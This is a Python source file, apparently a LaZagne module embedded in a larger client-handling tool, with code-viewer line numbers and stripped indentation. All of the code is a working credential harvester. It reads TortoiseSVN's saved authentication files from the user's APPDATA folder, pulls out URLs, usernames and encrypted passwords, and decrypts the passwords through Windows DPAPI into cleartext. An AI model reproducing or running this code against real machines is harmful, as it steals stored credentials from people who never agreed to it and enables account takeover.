1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
|
# -*- coding: utf-8 -*-
import base64
from foreign.client_handling.lazagne.config.module_info import ModuleInfo
from foreign.client_handling.lazagne.config.winstructure import Win32CryptUnprotectData
from foreign.client_handling.lazagne.config.constant import constant
import os
class Tortoise(ModuleInfo):
def __init__(self):
ModuleInfo.__init__(self, 'tortoise', 'svn', winapi_used=True)
def run(self):
pwd_found = []
path = os.path.join(constant.profile["APPDATA"], u'Subversion\\auth\\svn.simple')
if os.path.exists(path):
for root, dirs, files in os.walk(path + os.sep):
for filename in files:
f = open(os.path.join(path, filename), 'r')
url = ''
username = ''
result = ''
i = 0
# password
for line in f:
if i == -1:
result = line.replace('\n', '')
break
if line.startswith('password'):
i = -3
i += 1
i = 0
# url
for line in f:
if i == -1:
url = line.replace('\n', '')
break
if line.startswith('svn:realmstring'):
i = -3
i += 1
i = 0
# username
for line in f:
if i == -1:
username = line.replace('\n', '')
break
if line.startswith('username'):
i = -3
i += 1
# encrypted the password
if result:
try:
password = Win32CryptUnprotectData(base64.b64decode(result), is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi)
pwd_found.append({
'URL': url,
'Login': username,
'Password': str(password)
})
except Exception:
pass
return pwd_found
|